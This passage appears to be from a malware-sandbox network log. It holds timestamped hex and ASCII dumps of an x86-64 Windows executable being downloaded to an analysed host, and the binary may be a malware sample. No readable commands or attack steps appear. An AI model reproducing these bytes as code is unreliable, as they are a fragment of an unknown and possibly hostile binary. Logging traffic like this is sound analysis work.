41 89 c0 41 b9 04 00 00 00 e8 d0 c1 Data Ascii: =jt\EL5fL%gID=A41ML9%11AAD!ADAAD-f)EI+DA-;)I+nHGD\|$@@\|$8Dt$0\$(l$ AA
2022-03-22 15:50:26 UTC	445	IN	Data Raw: ed 74 42 41 0f ba e2 08 72 32 48 8d 57 df 48 83 fa 0d 89 44 24 58 0f 87 55 01 00 00 b9 60 00 00 00 48 8d 2d bd 13 00 00 48 63 54 95 00 48 01 ea ff e2 b9 69 00 00 00 e9 29 02 00 00 89 44 24 58 e9 2f 02 00 00 48 8b 0d 95 a4 06 00 80 b9 89 01 00 00 00 74 1f 8a 4c 24 57 f6 d1 8b 54 24 5c 83 fa 02 41 0f 95 c1 31 c0 44 84 c9 75 96 83 fa 03 75 0d eb 8f 83 7c 24 5c 03 75 04 31 c0 eb 84 45 85 c0 0f 95 c1 41 08 cd 31 c0 41 80 fd 01 75 0f 44 89 d1 81 e1 00 01 00 00 0f 84 6b ff ff ff c7 44 24 58 00 00 00 00 e9 c8 01 00 00 85 ed 0f 84 5a 01 00 00 83 fd 03 75 0d e8 92 6c 00 00 84 c0 0f 84 48 01 00 00 31 c9 e8 d3 63 00 00 e8 0c 61 00 00 e9 60 11 00 00 45 89 f0 41 c1 e8 10 44 89 84 24 28 01 00 00 48 8b 0d f4 a3 06 00 ba 01 00 00 00 e8 38 93 fe ff 80 3d 36 ac 06 00 01 75 Data Ascii: tBAr2HWHD$XU`H-HcTHi)D$X/HtL$WT$\A1Duu\|$\u1EA1AuDkD$XZulH1ca`EAD$(H8=6u
2022-03-22 15:50:26 UTC	453	IN	Data Raw: 66 41 0f ef c8 66 41 0f 6f fa 66 0f 66 f9 66 41 0f 76 ca 66 0f 70 f1 f5 66 0f db f7 66 0f 70 cf f5 66 0f eb ce 66 0f 7e ca f6 c2 01 74 05 c6 44 88 07 04 66 0f 73 d9 06 66 0f 7e ca c1 ea 10 f6 c2 01 74 05 c6 44 88 0b 04 66 0f 6f ca 66 41 0f ef c8 66 41 0f 6f f2 66 0f 66 f1 66 41 0f 76 ca 66 0f 70 f9 f5 66 0f db fe 66 0f 70 ce f5 66 0f eb cf 66 0f c5 d1 00 f6 c2 01 74 05 c6 44 88 0f 04 66 0f c5 d1 04 f6 c2 01 74 05 c6 44 88 13 04 66 0f 6f cc 66 41 0f ef c8 66 41 0f 6f fa 66 0f 66 f9 66 0f 70 f7 44 66 41 0f 76 ca 66 0f 70 e9 55 66 0f db ee 66 0f 70 f7 55 66 0f eb f5 66 0f c5 d6 04 f6 c2 01 74 05 c6 44 88 17 04 66 0f 70 c9 f5 66 0f db cf 66 0f 70 ef f5 66 0f eb e9 66 0f c5 d5 04 f6 c2 01 74 05 c6 44 88 1b 04 66 0f 6f c8 66 41 0f ef c8 66 41 0f 6f ea 66 0f 66 Data Ascii: fAfAofffAvfpffpff~tDfsf~tDfofAfAofffAvfpffpfftDftDfofAfAofffpDfAvfpUffpUfftDfpffpfftDfofAfAoff
2022-03-22 15:50:26 UTC	461	IN	Data Raw: c0 e8 64 fc fe ff 48 85 c0 74 14 44 8b 00 48 8b 4c 24 50 48 8d 15 6a 5f 05 00 e8 60 0c ff ff 89 5c 24 5c 89 7c 24 68 48 8b 5c 24 70 eb 30 85 ff 78 0c 89 f8 44 8b 84 84 30 01 00 00 eb 03 45 31 c0 48 8b 4c 24 50 48 8d 15 37 5f 05 00 e8 2d 0c ff ff c7 44 24 5c ff ff ff ff 89 7c 24 68 39 6c 24 64 75 07 44 39 74 24 60 74 76 41 83 fe ff 74 40 44 89 b4 24 04 01 00 00 48 8b 8c 24 a0 00 00 00 48 8d 94 24 00 01 00 00 45 31 c0 e8 d9 fb fe ff 48 85 c0 74 14 44 8b 00 48 8b 4c 24 50 48 8d 15 d1 5e 05 00 e8 d5 0b ff ff 44 89 74 24 60 eb 2c 85 ed 78 0c 89 e8 44 8b 84 84 30 01 00 00 eb 03 45 31 c0 48 8b 4c 24 50 48 8d 15 a6 5e 05 00 e8 aa 0b ff ff c7 44 24 60 ff ff ff ff 89 6c 24 64 41 81 e5 00 00 08 00 44 39 bc 24 84 00 00 00 74 46 31 c0 45 85 ff 48 8d 0d b2 5e 05 00 48 Data Ascii: dHtDHL$PHj_`\$\\|$hH\$p0xD0E1HL$PH7_-D$\\|$h9l$duD9t$`tvAt@D$H$H$E1HtDHL$PH^Dt$`,xD0E1HL$PH^D$`l$dAD9$tF1EH^H
2022-03-22 15:50:26 UTC	469	IN	Data Raw: 4c 8b bc 24 f0 00 00 00 44 8b 6c 24 4c 8b bc 24 e8 00 00 00 83 3d e6 47 06 00 01 44 8b b4 24 8c 00 00 00 44 8b 64 24 74 75 76 8b 44 24 48 25 00 00 04 00 74 6b 48 8b 0d a5 47 06 00 ba 01 00 00 00 ff 15 8a cf 05 00 31 c9 48 8b 05 11 4e 06 00 41 83 fd 03 75 06 8b 0d 99 46 06 00 44 8b 44 24 64 41 29 c8 ff cf 48 8b 0d 74 47 06 00 48 8b 54 24 78 48 89 54 24 38 48 8b 54 24 50 89 54 24 30 48 89 44 24 28 48 8d 84 24 00 01 00 00 48 89 44 24 20 89 fa 41 b9 04 00 00 00 ff 15 69 ce 05 00 48 8b 0d 3a 47 06 00 ba 01 00 00 00 ff 15 1f cf 05 00 4c 8b 44 24 68 48 8b 84 24 a8 00 00 00 4d 8d 04 40 8b 84 24 ec 00 00 00 41 0f af c6 41 01 c7 31 c0 44 2b 64 24 50 0f 8f 67 f6 ff ff 41 83 fd 02 74 4a 80 bc 24 e4 00 00 00 00 75 14 80 3d 10 47 06 00 00 75 37 8b 44 24 48 25 00 00 08 Data Ascii: L$Dl$L$=GD$Dd$tuvD$H%tkHG1HNAuFDD$dA)HtGHT$xHT$8HT$PT$0HD$(H$HD$ AiH:GLD$hH$M@$AA1D+d$PgAtJ$u=Gu7D$H%
2022-03-22 15:50:26 UTC	477	IN	Data Raw: 00 48 8b 4c 24 60 48 31 e1 e8 23 c2 00 00 89 e8 48 83 c4 68 5b 5d 5f 5e 41 5e 41 5f c3 56 57 48 83 ec 68 48 8b 05 b7 02 06 00 48 31 e0 48 89 44 24 60 48 85 d2 74 65 48 89 d6 c7 02 00 00 00 00 48 8d 44 24 40 48 8d 54 24 30 48 89 42 08 48 b9 00 00 00 00 02 00 00 00 48 89 0a c7 40 04 01 00 00 00 41 8b 08 89 08 49 8b 48 08 48 89 48 08 c7 40 14 02 00 00 00 41 8b 09 89 48 10 49 8b 49 08 48 89 48 18 48 8d 4e 18 4c 8d 4c 24 2c 45 31 c0 ff 15 63 30 06 00 89 c7 89 06 eb 05 bf 06 00 00 00 48 8b 4c 24 60 48 31 e1 e8 83 c1 00 00 89 f8 48 83 c4 68 5f 5e c3 48 83 ec 28 48 8b 4a 08 e8 3f a5 f9 ff 31 c0 48 83 c4 28 c3 cc cc 56 48 83 ec 20 48 85 d2 74 29 4c 89 c6 8b 0a 8d 81 00 fd f6 7f 83 f8 11 77 20 48 8d 0d 8b 00 00 00 48 63 04 81 48 01 c8 ff e0 48 8d 0d 57 f8 04 00 eb Data Ascii: HL$`H1#Hh[]_^A^A_VWHhHH1HD$`HteHHD$@HT$0HBHH@AIHHH@AHIIHHHNLL$,E1c0HL$`H1Hh_^H(HJ?1H(VH Ht)Lw HHcHHW
2022-03-22 15:50:26 UTC	484	IN	Data Raw: f9 ff 48 89 f1 48 83 c4 20 5e e9 b4 86 f9 ff 48 8b 12 48 8b 49 08 e9 e8 81 f9 ff 56 57 48 83 ec 28 48 8b 49 20 e8 e0 83 f9 ff 48 89 c6 b9 01 00 00 00 ba 08 00 00 00 45 31 c0 e8 0a 86 f9 ff 48 89 c7 48 89 f1 e8 bc a9 fe ff 48 89 07 48 89 f8 48 83 c4 28 5f 5e c3 56 48 83 ec 20 0f be f1 48 8d 0d 20 e6 04 00 41 b8 0a 00 00 00 89 f2 e8 7e b2 00 00 48 85 c0 40 0f b6 ce b8 2e 00 00 00 0f 44 c1 48 83 c4 20 5e c3 56 57 48 83 ec 38 48 8b 05 0c e3 05 00 48 31 e0 48 89 44 24 30 80 3d a5 19 06 00 00 74 09 48 8b 35 94 19 06 00 eb 45 48 8d 0d ca 65 04 00 e8 08 01 00 00 48 89 c6 48 8d 0d 8d 65 04 00 e8 f9 00 00 00 48 85 f6 74 15 48 8d 15 9b b9 04 00 48 89 f1 ff 15 4a 97 05 00 48 89 c6 eb 02 31 f6 48 89 35 54 19 06 00 c6 05 55 19 06 00 01 48 85 f6 74 5d 48 8d 7c 24 2c c7 Data Ascii: HH ^HHIVWH(HI HE1HHHHH(_^VH H A~H@.DH ^VWH8HH1HD$0=tH5EHeHHeHtHHJH1H5TUHt]H\|$,
2022-03-22 15:50:26 UTC	492	IN	Data Raw: ff 0f 85 22 01 00 00 e9 37 02 00 00 85 ff 75 5f 49 8b 44 24 60 48 85 c0 74 61 83 fb 17 0f 85 af 00 00 00 66 c7 84 24 70 02 00 00 17 00 41 0f b7 4c 24 70 ff 15 b8 fb 05 00 66 89 84 24 72 02 00 00 49 8b 44 24 60 48 8b 40 20 0f 10 40 08 0f 11 84 24 78 02 00 00 8b 48 04 89 8c 24 74 02 00 00 8b 40 18 89 84 24 88 02 00 00 e9 8f 00 00 00 89 f9 e8 bf f1 ff ff e9 9b 00 00 00 49 8b 54 24 58 48 8b 42 20 48 85 c0 74 0a 41 8b 4c 24 68 3b 4a 28 7c 27 48 8d 0d 51 f3 04 00 48 8d 15 12 01 05 00 41 b8 fa 03 00 00 e8 6d 42 01 00 49 8b 44 24 58 48 8b 40 20 41 8b 4c 24 68 66 c7 84 24 60 02 00 00 02 00 48 63 c9 8b 0c 88 ff 15 19 fb 05 00 eb 11 66 c7 84 24 60 02 00 00 02 00 48 8b 40 20 8b 40 04 89 84 24 64 02 00 00 41 0f b7 4c 24 70 ff 15 fb fa 05 00 66 89 84 24 62 02 00 00 4c Data Ascii: "7u_ID$`Htaf$pAL$pf$rID$`H@ @$xH$t@$IT$XHB HtAL$h;J(\|'HQHAmBID$XH@ AL$hf$`Hcf$`H@ @$dAL$pf$bL
2022-03-22 15:50:26 UTC	500	IN	Data Raw: 84 c0 0f 84 68 01 00 00 e8 4c 0c 00 00 48 85 c0 0f 84 56 01 00 00 48 89 c7 ba 28 00 00 00 b9 40 00 00 00 ff 15 a0 5a 05 00 48 85 c0 0f 84 3a 01 00 00 48 89 c5 48 89 c1 ba 01 00 00 00 ff 15 16 e4 05 00 85 c0 0f 84 18 01 00 00 48 89 e9 48 89 fa 45 31 c0 ff 15 07 e4 05 00 85 c0 0f 84 01 01 00 00 c7 44 24 58 18 00 00 00 c7 44 24 68 01 00 00 00 48 89 6c 24 60 48 8d 54 24 58 e9 ef 00 00 00 4d 85 e4 74 63 45 31 ed b9 01 00 00 00 ba 28 00 00 00 45 31 c0 e8 2e 47 f9 ff 48 89 c6 48 8d 15 62 02 00 00 48 89 e9 49 89 c0 45 31 c9 e8 4e a3 ff ff 48 89 06 48 89 6e 08 e8 e7 6e fe ff 48 89 46 10 4c 89 66 18 48 8b 84 24 e0 04 00 00 48 89 46 20 48 c7 c5 ff ff ff ff 48 8b 5c 24 38 48 8b 7c 24 40 e9 77 fe ff ff e8 b8 6e fe ff 49 89 c5 48 8d 7c 24 70 48 8d 5c 24 54 4c 8b 25 27 Data Ascii: hLHVH(@ZH:HHHHE1D$XD$hHl$`HT$XMtcE1(E1.GHHbHIE1NHHnnHFLfH$HF HH\$8H\|$@wnIH\|$pH\$TL%'
2022-03-22 15:50:26 UTC	508	IN	Data Raw: 48 89 c6 48 8b 44 24 20 48 89 06 eb 02 31 f6 48 8b 4c 24 30 48 31 e1 e8 15 45 00 00 48 89 f0 48 83 c4 38 5f 5e c3 41 57 41 56 56 57 53 48 83 ec 40 48 8b 05 a9 85 05 00 48 31 e0 48 89 44 24 38 48 85 c9 0f 84 b5 00 00 00 48 89 d7 48 89 cb 48 8b 09 4c 8d 7c 24 30 4c 89 7c 24 28 48 c7 44 24 20 00 00 00 00 31 f6 4c 8d 4c 24 34 45 31 c0 ff 15 0c 38 05 00 85 c0 0f 85 83 00 00 00 83 7c 24 34 01 75 7c 44 8b 74 24 30 41 ff c6 ba 01 00 00 00 4c 89 f1 45 31 c0 e8 ed 27 f9 ff 48 89 c6 48 8b 0b 4c 89 7c 24 28 48 89 44 24 20 4c 8d 4c 24 34 48 89 fa 45 31 c0 ff 15 c4 37 05 00 85 c0 75 35 83 7c 24 34 01 75 2e 8b 44 24 30 44 39 f0 72 1d 48 8d 0d 43 bd 04 00 48 8d 15 18 c7 04 00 41 b8 92 00 00 00 e8 af 03 01 00 8b 44 24 30 89 c0 c6 04 06 00 eb 0a 48 89 f1 e8 05 28 f9 ff 31 Data Ascii: HHD$ H1HL$0H1EHH8_^AWAVVWSH@HH1HD$8HHHHL\|$0L\|$(HD$ 1LL$4E18\|$4u\|Dt$0ALE1'HHL\|$(HD$ LL$4HE17u5\|$4u.D$0D9rHCHAD$0H(1
2022-03-22 15:50:26 UTC	516	IN	Data Raw: 28 89 d9 ff 15 50 1a 05 00 85 c0 74 25 bf fd ff ff ff 83 7c 24 28 01 77 1e 89 df 83 fb ff 75 17 31 ff 80 3e 00 40 0f 94 c7 83 cf fe eb 09 89 df eb 05 bf fe ff ff ff 48 8b 4c 24 40 48 31 e1 e8 ad 25 00 00 89 f8 48 83 c4 48 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 54 56 57 55 53 48 83 ec 40 48 89 d6 48 8b 05 32 66 05 00 48 31 e0 48 89 44 24 38 31 db 45 85 c0 40 0f 95 c5 45 31 f6 41 83 f8 02 41 0f 95 c6 41 c1 e6 07 41 83 ee 80 85 c9 74 3d 41 89 cf 83 f9 01 74 3d 41 81 ff e9 fd 00 00 75 3d 44 89 f0 66 0f 6f 05 be 38 03 00 31 c9 66 0f 6f 0d 94 cf 02 00 f3 0f 7f 04 4e 48 83 c1 08 66 0f fd c1 48 39 c8 75 ee e9 dd 00 00 00 ff 15 77 19 05 00 eb 06 ff 15 37 1a 05 00 41 89 c7 41 8d 47 ff 3d fe ff 00 00 77 56 40 88 eb 8d 1c 9d 08 00 00 00 44 89 f5 31 ff Data Ascii: (Pt%\|$(wu1>@HL$@H1%HH[]_^A\A]A^A_AWAVATVWUSH@HH2fH1HD$81E@E1AAAAt=At=Au=Dfo81foNHfH9uw7AAG=wV@D1
2022-03-22 15:50:26 UTC	523	IN	Data Raw: 96 48 89 fa 48 29 c2 0f b6 6a 97 c1 e5 08 41 8d 0c 28 89 4f c4 0f b6 44 38 98 0f b6 52 99 c1 e2 08 8d 0c 02 89 4f cc 41 8d 0c 28 83 c1 03 83 e1 fc 89 4f c8 01 d0 83 c0 03 83 e0 fc 89 47 d0 48 83 c9 01 ba 01 00 00 00 45 31 c0 e8 b9 e9 f8 ff 48 89 47 b0 48 63 4f d0 ba 01 00 00 00 45 31 c0 e8 a4 e9 f8 ff 48 89 47 b8 48 85 f6 74 65 48 63 47 c0 8b 4f c8 83 c1 0c 39 c8 7d 40 48 8d 6b 01 8d 48 01 8a 13 48 8b 5f b0 89 4f c0 88 54 18 f4 48 89 eb 48 ff ce 75 d6 eb 3c 48 8d 6b 01 8d 50 01 29 c8 83 c0 f4 8a 0b 48 8b 5f b8 89 57 c0 48 98 88 0c 03 48 89 eb 48 ff ce 74 1a 8b 47 c0 8b 4f c8 8b 57 d0 01 ca 83 c2 0c 39 d0 7c cc 48 89 dd eb 05 48 89 dd 31 f6 8b 47 c8 8b 4f d0 01 c8 83 c0 0c 39 47 c0 0f 8c fa 01 00 00 4c 8d 77 90 41 80 7e 44 00 74 18 48 8b 4f f0 48 8b 01 48 Data Ascii: HH)jA(OD8ROA(OGHE1HGHcOE1HGHteHcGO9}@HkHH_OTHHu<HkP)H_WHHHtGOW9\|HH1GO9GLwA~DtHOHH
2022-03-22 15:50:26 UTC	531	IN	Data Raw: 0f 74 02 66 0f d7 c8 66 0f 70 d9 00 66 0f 6f c3 66 41 0f 74 02 66 0f d7 d0 41 23 d1 41 23 c9 75 2e 0f bd ca 66 0f 6f ca 66 0f 6f c3 49 03 ca 85 d2 4c 0f 45 c1 49 83 c2 10 66 41 0f 74 0a 66 41 0f 74 02 66 0f d7 c9 66 0f d7 d0 85 c9 74 d2 8b c1 f7 d8 23 c1 ff c8 23 d0 0f bd ca 49 03 ca 85 d2 4c 0f 45 c1 49 8b c0 48 83 c4 18 c3 41 0f be 01 49 8b c9 3b c2 49 0f 45 c8 41 80 39 00 4c 8b c1 74 2e 49 ff c1 41 f6 c1 0f 75 e1 0f b6 c2 66 0f 6e c0 66 41 0f 3a 63 01 40 73 0d 4c 63 c1 4d 03 c1 66 41 0f 3a 63 01 40 74 ba 49 83 c1 10 eb e2 48 8b c1 eb b2 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 10 40 8a 3a 48 8b da 4c 8b c1 40 84 ff 75 08 48 8b c1 e9 cb 01 00 00 83 3d 5c 27 05 00 02 41 ba ff 0f 00 00 45 8d 5a f1 0f 8d d4 00 00 00 40 0f b6 c7 0f 57 d2 8b c8 c1 Data Ascii: tffpfofAtfA#A#u.fofoILEIfAtfAtfft##ILEIHAI;IEA9Lt.IAufnfA:c@sLcMfA:c@tIHH\$Ht$WH@:HL@uH=\'AEZ@W
2022-03-22 15:50:26 UTC	539	IN	Data Raw: 80 68 04 00 00 48 ff 00 49 8b 40 18 8a 08 48 ff c0 41 88 48 41 49 89 40 18 84 c9 75 14 e8 0b 7b 00 00 c7 00 16 00 00 00 e8 80 ff 00 00 32 c0 eb 02 b0 01 48 83 c4 28 c3 cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 56 48 83 ec 20 48 8b 59 10 4c 8b f2 48 8b f9 48 85 db 75 0c e8 ce 7a 00 00 48 8b d8 48 89 47 10 8b 2b 48 8d 54 24 40 83 23 00 be 01 00 00 00 48 8b 4f 18 48 83 64 24 40 00 48 2b ce 44 8d 46 09 e8 36 d2 00 00 41 89 06 48 8b 47 10 48 85 c0 75 09 e8 91 7a 00 00 48 89 47 10 83 38 22 74 11 48 8b 44 24 40 48 3b 47 18 72 06 48 89 47 18 eb 03 40 32 f6 83 3b 00 75 06 85 ed 74 02 89 2b 48 8b 5c 24 48 40 8a c6 48 8b 6c 24 50 48 83 c4 20 41 5e 5f 5e c3 cc cc cc 48 83 ec 28 8a 41 41 3c 46 75 19 f6 01 08 0f 85 58 01 00 00 c7 41 2c 07 00 00 00 48 83 c4 28 e9 50 01 Data Ascii: hHI@HAHAI@u{2H(H\$Hl$VWAVH HYLHHuzHHG+HT$@#HOHd$@H+DF6AHGHuzHG8"tHD$@H;GrHG@2;ut+H\$H@Hl$PH A^_^H(AA<FuXA,H(P
2022-03-22 15:50:26 UTC	547	IN	Data Raw: 30 02 00 00 48 81 c4 48 02 00 00 41 5e 5e c3 cc cc 48 83 ec 38 80 79 08 00 74 08 48 8b 01 48 83 c4 38 c3 48 83 64 24 20 00 4c 8d 05 a1 85 04 00 41 b9 9f 01 00 00 48 8d 15 04 86 04 00 48 8d 0d 3d 75 04 00 e8 44 e0 00 00 cc cc cc cc 48 83 ec 38 80 79 08 00 75 08 48 8b 01 48 83 c4 38 c3 48 83 64 24 20 00 4c 8d 05 65 85 04 00 41 b9 a5 01 00 00 48 8d 15 18 84 04 00 48 8d 0d e9 74 04 00 e8 08 e0 00 00 cc cc cc cc 48 89 5c 24 18 89 54 24 10 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 83 64 24 70 00 48 8b c1 48 8b d9 48 c1 e8 20 b9 ff ff ff ff 45 8a d1 41 8a f0 44 8b da 48 3b d9 76 10 0f bd c8 74 04 ff c1 eb 02 33 c9 83 c1 20 eb 0b 0f bd cb 74 04 ff c1 eb 02 33 c9 4c 8b bc 24 90 00 00 00 41 8b fb 41 8a 57 08 8a c2 f6 d8 8a c2 45 1b f6 41 83 e6 1d 41 83 c6 18 44 Data Ascii: 0HHA^^H8ytHH8Hd$ LAHH=uDH8yuHH8Hd$ LeAHHtH\$T$UVWATAUAVAWH0d$pHHH EADH;vt3 t3L$AAWEAAD
2022-03-22 15:50:26 UTC	555	IN	Data Raw: 7e 48 8b 7c 24 50 8b 5c 24 40 44 8b 64 24 38 45 3b d8 72 5d 41 8b c3 41 2b c0 8d 48 ff 41 3b c7 73 0a 44 8b 94 85 24 03 00 00 eb 03 45 33 d2 41 3b cf 73 09 8b 94 8d 24 03 00 00 eb 02 33 d2 41 23 d4 41 8b c3 8b cb 44 23 d7 d3 ea 8b ce 41 d3 e2 41 0b d2 89 94 85 24 03 00 00 b8 ff ff ff ff 44 03 d8 44 3b d8 74 09 44 8b bd 20 03 00 00 eb 9e 8b 7c 24 30 bb 72 00 00 00 44 8b 64 24 34 33 c9 45 85 c0 74 0f 83 a4 8d 24 03 00 00 00 ff c1 41 3b c8 75 f1 41 3b f4 41 8d 41 01 45 8b f9 44 0f 47 f8 33 f6 44 89 bd 20 03 00 00 eb 2a 33 f6 4c 8d 45 84 45 33 c9 89 75 80 ba cc 01 00 00 89 b5 20 03 00 00 48 8d 8d 24 03 00 00 e8 bc d9 ff ff 44 8b bd 20 03 00 00 41 bb ff ff ff ff 41 bc 20 00 00 00 8b 4c 24 48 8b 44 24 3c 2b c8 89 4c 24 48 44 8b d1 85 c0 74 27 3b f9 76 20 48 8b Data Ascii: ~H\|$P\$@Dd$8E;r]AA+HA;sD$E3A;s$3A#AD#AA$DD;tD \|$0rDd$43Et$A;uA;AAEDG3D *3LEE3u H$D AA L$HD$<+L$HDt';v H
2022-03-22 15:50:26 UTC	563	IN	Data Raw: 00 00 00 85 c9 0f 84 bf 00 00 00 83 e9 01 0f 84 9a 00 00 00 83 e9 01 74 78 83 e9 01 74 36 83 f9 01 0f 85 89 01 00 00 8a 82 08 03 00 00 f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 b8 ff ff ff ff ff ff ff 7f 48 03 c8 49 89 08 e9 70 01 00 00 8a 82 08 03 00 00 48 ba 00 00 00 00 00 00 f0 7f f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 b8 00 00 00 00 00 00 f0 ff 48 03 ca 48 23 c8 49 8b 00 48 23 c2 48 0b c8 eb bb 8a 82 08 03 00 00 f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 23 c8 eb 9e 48 8d 54 24 20 4c 89 44 24 20 49 8b c9 c6 44 24 28 01 e8 d8 e3 ff ff e9 fc 00 00 00 48 8d 54 24 20 4c 89 44 24 20 49 8b c9 c6 44 24 28 01 e8 38 c6 ff ff e9 e0 00 00 00 8a 82 08 03 00 00 48 ba 00 00 00 00 00 00 f0 7f f6 d8 48 b8 00 00 00 00 00 Data Ascii: txt6HHH#HHIpHHHH#HHH#IH#HHHH#H#HT$ LD$ ID$(HT$ LD$ ID$(8HH
2022-03-22 15:50:26 UTC	570	IN	Data Raw: 2d d3 04 00 74 04 33 c0 eb 48 e8 5e 77 00 00 e8 f9 b6 00 00 48 8b d8 48 85 c0 75 05 83 cf ff eb 27 48 8b cb e8 b0 00 00 00 48 85 c0 75 05 83 cf ff eb 0e 48 89 05 0f d3 04 00 48 89 05 f0 d2 04 00 33 c9 e8 69 81 00 00 48 8b cb e8 61 81 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 48 83 ec 28 48 8b 09 48 3b 0d de d2 04 00 74 05 e8 23 00 00 00 48 83 c4 28 c3 cc cc 48 83 ec 28 48 8b 09 48 3b 0d ba d2 04 00 74 05 e8 07 00 00 00 48 83 c4 28 c3 cc cc 48 85 c9 74 3b 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b d9 48 8b f9 eb 0f 48 8b c8 e8 fa 80 00 00 48 8d 7f 08 48 8b 07 48 85 c0 75 ec 48 8b cb e8 e6 80 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 30 4c 8b f1 33 f6 8b ce 4d 8b c6 41 8a 16 eb Data Ascii: -t3H^wHHu'HHuHH3iHaH\$0H _H(HH;t#H(H(HH;tH(Ht;H\$WH HHHHHHHuHH\$0H _H\$Hl$Ht$WAVAWH0L3MA
2022-03-22 15:50:26 UTC	578	IN	Data Raw: 44 88 11 49 83 f9 04 75 d4 41 b0 01 41 8a c0 c3 cc 48 83 ec 38 48 83 64 24 28 00 48 8d 54 24 20 48 89 4c 24 20 41 b1 01 33 c9 41 b8 0a 00 00 00 e8 08 00 00 00 48 83 c4 38 c3 cc cc cc 48 89 5c 24 08 48 89 74 24 18 55 57 41 54 41 56 41 57 48 8b ec 48 83 ec 40 48 83 3a 00 41 8a f9 45 8b f8 48 8b da 75 26 e8 83 de ff ff c7 00 16 00 00 00 e8 f8 62 00 00 48 8b 4b 08 48 85 c9 74 06 48 8b 03 48 89 01 33 c0 e9 d3 02 00 00 45 85 ff 74 09 41 8d 40 fe 83 f8 22 77 cc 48 8b d1 48 8d 4d e0 e8 a8 48 ff ff 4c 8b 23 45 33 f6 48 8b 55 e8 41 8a 34 24 4d 8d 44 24 01 4c 89 03 83 7a 08 01 7e 1b 40 0f b6 ce 4c 8d 45 e8 ba 08 00 00 00 e8 16 81 00 00 4c 8b 03 48 8b 55 e8 eb 0e 48 8b 02 40 0f b6 ce 0f b7 04 48 83 e0 08 85 c0 74 0c 48 8b 03 40 8a 30 4c 8d 40 01 eb be 40 0f b6 c7 8b Data Ascii: DIuAAH8Hd$(HT$ HL$ A3AH8H\$Ht$UWATAVAWHH@H:AEHu&bHKHtHH3EtA@"wHHMHL#E3HUA4$MD$Lz~@LELHUH@HtH@0L@@
2022-03-22 15:50:26 UTC	586	IN	Data Raw: f9 ff ff 00 00 76 39 48 83 fd 01 76 47 81 c1 00 00 ff ff 41 b8 00 d8 00 00 8b c1 89 4c 24 50 c1 e8 0a 48 ff cd 66 41 0b c0 66 89 03 b8 ff 03 00 00 66 23 c8 48 83 c3 02 b8 00 dc 00 00 66 0b c8 66 89 0b 48 03 fa 48 83 c3 02 48 83 ed 01 0f 85 5f ff ff ff 49 2b df 49 89 3e 48 d1 fb 48 8b c3 eb 1b 49 8b fd 66 44 89 2b eb e9 49 89 3e e8 3a bf ff ff c7 00 2a 00 00 00 48 83 c8 ff 48 8b 5c 24 58 48 8b 6c 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 49 8b dd 44 38 2f 75 08 41 b8 01 00 00 00 eb 1d 44 38 6f 01 75 08 41 b8 02 00 00 00 eb 0f 8a 47 02 f6 d8 4d 1b c0 49 f7 d8 49 83 c0 03 4d 8b cc 48 8b d7 33 c9 e8 06 aa 00 00 48 83 f8 ff 74 99 48 85 c0 74 83 48 83 f8 04 75 03 48 ff c3 48 03 f8 48 ff c3 eb ad cc cc cc cc cc cc 41 54 41 55 41 56 48 81 ec 50 04 00 00 48 Data Ascii: v9HvGAL$PHfAff#HffHHH_I+I>HHIfD+I>:*HH\$XHl$`H A_A^A]A\_ID8/uAD8ouAGMIIMH3HtHtHuHHHATAUAVHPH
2022-03-22 15:50:26 UTC	594	IN	Data Raw: 04 00 ff 75 07 33 c0 e9 89 00 00 00 ff 15 47 e2 03 00 8b 0d 49 2e 04 00 8b f8 e8 b6 01 00 00 48 83 ca ff 33 f6 48 3b c2 74 60 48 85 c0 74 05 48 8b f0 eb 56 8b 0d 27 2e 04 00 e8 de 01 00 00 85 c0 74 47 ba 78 00 00 00 8d 4a 89 e8 dd 89 00 00 8b 0d 0b 2e 04 00 48 8b d8 48 85 c0 74 12 48 8b d0 e8 b7 01 00 00 85 c0 75 0f 8b 0d f1 2d 04 00 33 d2 e8 a6 01 00 00 eb 09 48 8b cb 48 8b de 48 8b f1 48 8b cb e8 2f d8 ff ff 8b cf ff 15 17 e4 03 00 48 8b c6 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 83 ec 28 48 85 c9 74 11 48 8d 05 4c 75 04 00 48 3b c8 74 05 e8 fa d7 ff ff 48 83 c4 28 c3 cc 40 53 48 83 ec 20 33 db 48 8d 15 a5 75 04 00 45 33 c0 48 8d 0c 9b 48 8d 0c ca ba a0 0f 00 00 e8 88 01 00 00 85 c0 74 11 ff 05 ae 75 04 00 ff c3 83 fb 01 72 d3 b0 01 eb 07 e8 Data Ascii: u3GI.H3H;t`HtHV'.tGxJ.HHtHu-3HHHH/HH\$0Ht$8H _H(HtHLuH;tH(@SH 3HuE3HHtur
2022-03-22 15:50:26 UTC	602	IN	Data Raw: 70 49 03 c0 0f 11 49 f0 48 83 ea 01 75 b6 0f 10 00 0f 11 01 0f 10 48 10 0f 11 49 10 48 8b 40 20 48 89 41 20 8b cf 21 13 48 8b d3 e8 9d fa ff ff 8b f8 83 f8 ff 75 25 e8 f1 80 ff ff c7 00 16 00 00 00 83 cf ff 48 8b cb e8 64 04 00 00 8b c7 48 8b 5c 24 60 48 83 c4 40 5f 5e 5d c3 40 84 f6 75 05 e8 77 77 ff ff 48 8b 45 30 48 8b 88 88 00 00 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1c 48 8b 45 30 48 8b 88 88 00 00 00 48 8d 05 e2 0f 04 00 48 3b c8 74 05 e8 18 04 00 00 c7 03 01 00 00 00 48 8b cb 48 8b 45 30 33 db 48 89 88 88 00 00 00 48 8b 45 30 f6 80 a8 03 00 00 02 75 89 f6 05 0e 17 04 00 01 75 80 48 8d 45 30 48 89 45 f0 4c 8d 4d e4 48 8d 45 38 48 89 45 f8 4c 8d 45 f0 8d 43 05 48 8d 55 e8 